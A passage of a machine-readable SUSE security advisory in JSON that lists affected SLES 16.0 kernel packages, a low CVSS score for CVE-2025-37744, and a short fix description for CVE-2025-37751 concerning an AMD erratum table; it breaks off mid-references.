"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37744"
},
{
"cve": "CVE-2025-37751",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37751"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Avoid running off the end of an AMD erratum table\n\nThe NULL array terminator at the end of erratum_1386_microcode was\nremoved during the switch from x86_cpu_desc to x86_cpu_id. This\ncauses readers to run off the end of the array.\n\nReplace the NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37751",
"url": "https://www.suse.com/security/cve/CVE-2025-37751"
},
{
"category": "external",
"summary": "SUSE Bug 1242505 for CVE-2025-37751",
